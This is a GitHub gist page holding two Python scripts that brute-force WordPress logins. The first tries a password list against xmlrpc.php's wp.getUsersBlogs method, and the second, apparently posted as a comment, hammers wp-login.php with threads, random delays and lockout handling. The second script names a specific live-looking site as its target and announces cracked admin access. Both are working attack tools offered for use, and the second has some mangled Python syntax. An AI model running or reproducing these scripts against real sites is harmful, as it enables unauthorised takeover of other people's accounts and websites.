Created
July 30, 2016 17:14
-
-
Save fuuddanni/0b939a9ed5103b051f5c81fa01789792 to your computer and use it in GitHub Desktop.
Bruteforce Wordpress xmlrpc.php
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| import requests | |
| TARGET_URL = 'http://yourhosthere/xmlrpc.php' | |
| XML = ''' | |
| <?xml version="1.0" encoding="iso-8859-1"?> | |
| <methodCall> | |
| <methodName>wp.getUsersBlogs</methodName> | |
| <params> | |
| <param> | |
| <value> | |
| <string>{username}</string> | |
| </value> | |
| </param> | |
| <param> | |
| <value> | |
| <string>{password}</string> | |
| </value> | |
| </param> | |
| </params> | |
| </methodCall> | |
| ''' | |
| def wrap_creds_in_xml(username='', password=''): | |
| return XML.format(username=username, password=password) | |
| def is_correct(text=''): | |
| constant = 'Benutzer oder Passwort falsch' | |
| return constant not in text | |
| def get_passwords(): | |
| with open('CHANGEYOURPASSWORDLIST') as file: | |
| text_as_string = file.read() | |
| return text_as_string.split('\n') | |
| def main(): | |
| users = ('masteramse', 'admin', 'markus', ) | |
| passwords = get_passwords() | |
| for user, password in itertools.product(users, passwords): | |
| payload = wrap_creds_in_xml(username=user, password=password) | |
| response = requests.post(TARGET_URL, payload) | |
| correct = is_correct(text=response.text) | |
| if not correct: | |
| print('tried user "{}" pass"{}"'.format(user, password)) | |
| else: | |
| print('----------FOUND IT!') | |
| print('USER: {}\nPASS:{}'.format(user, password)) | |
| exit() | |
| if __name__ == '__main__': | |
| main() | |
import requests
import sys
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from random import uniform
class WordPressChecker:
def init(self, target_url='TargetUrl', threads=5):
self.target_url = target_url
self.threads = threads
self.session = requests.Session()
self.found = False
self.start_time = None
self.attempts = 0
def load_passwords(self, filename='Pass.txt'):
try:
with open(filename, 'r', encoding='utf-8', errors='ignore') as f:
return [line.strip() for line in f if line.strip()]
except FileNotFoundError:
print(f"Password file {filename} not found")
sys.exit(1)
def try_login(self, password):
if self.found:
return
try:
data = {
'log': '[email protected]',
'pwd': password,
'wp-submit': 'Log In'
}
response = self.session.post(self.target_url, data=data, allow_redirects=False)
self.attempts += 1
status_code = response.status_code
response_text = response.text.lower()
location_header = response.headers.get('Location', '')
print(f"[ATTEMPT {self.attempts}] Testing: {password}")
if status_code == 302 and 'wp-admin' in location_header:
self.found = True
print(f" SUCCESS! Redirect to admin detected!")
self.print_success(password)
sys.exit(0)
elif 'dashboard' in response_text or 'wp-admin' in response_text:
self.found = True
print(f" SUCCESS! Dashboard content found!")
self.print_success(password)
sys.exit(0)
elif 'incorrect password' in response_text:
print(f" WRONG PASSWORD: {password}")
elif 'invalid username' in response_text:
print(f" INVALID USERNAME (weird - should be correct)")
elif 'error' in response_text:
print(f" ERROR DETECTED with: {password}")
elif 'too many failed attempts' in response_text:
print(f" BLOCKED - Too many attempts with: {password}")
sleep(10)
elif status_code == 302:
print(f" REDIRECT with: {password} -> {location_header}")
else:
print(f" FAILED: {password} (Status: {status_code})")
if self.attempts % 10 == 0:
self.print_progress()
sleep(uniform(0.3, 1.0))
except requests.exceptions.ConnectionError:
print(f" CONNECTION ERROR with: {password}")
sleep(3)
except requests.exceptions.Timeout:
print(f" TIMEOUT with: {password}")
sleep(2)
except Exception as e:
print(f" EXCEPTION with {password}: {str(e)}")
sleep(1)
def print_progress(self):
elapsed = datetime.now() - self.start_time
rate = self.attempts / elapsed.total_seconds() if elapsed.total_seconds() > 0 else 0
print(f"\n PROGRESS: {self.attempts} attempts | Rate: {rate:.2f}/s | Elapsed: {elapsed}\n")
def print_success(self, password):
print("\n" + "=" * 60)
print(" CRACKED! WORDPRESS ACCESS GRANTED!")
print("=" * 60)
print(f" Username: [email protected]")
print(f" Password: {password}")
print(f" Login URL: {self.target_url}")
print("=" * 60)
print(" You can now login at: https://luxury-drip.com/wp-admin/")
print("=" * 60 + "\n")
def run(self):
self.start_time = datetime.now()
passwords = self.load_passwords()
print("\n" + "=" * 60)
print(" WORDPRESS BRUTE FORCE ATTACK STARTED")
print("=" * 60)
print(f" Target: {self.target_url}")
print(f" Username: [email protected]")
print(f" Passwords loaded: {len(passwords)}")
print(f" Threads: {self.threads}")
print(f" Start time: {self.start_time}")
print("=" * 60 + "\n")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.try_login, passwords)
if not self.found:
print("\n" + "=" * 50)
print(" BRUTE FORCE COMPLETED - NO PASSWORD FOUND")
print("=" * 50)
print(f"Total attempts: {self.attempts}")
print("Try a different password list or check if site is blocking")
print("=" * 50)
def main():
try:
checker = WordPressChecker(threads=5)
checker.run()
except KeyboardInterrupt:
print("\n\n OPERATION CANCELLED BY USER")
print(f"Total attempts made: {checker.attempts}")
except Exception as e:
print(f" CRITICAL ERROR: {str(e)}")
sys.exit(1)
if name == 'main':
main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
ty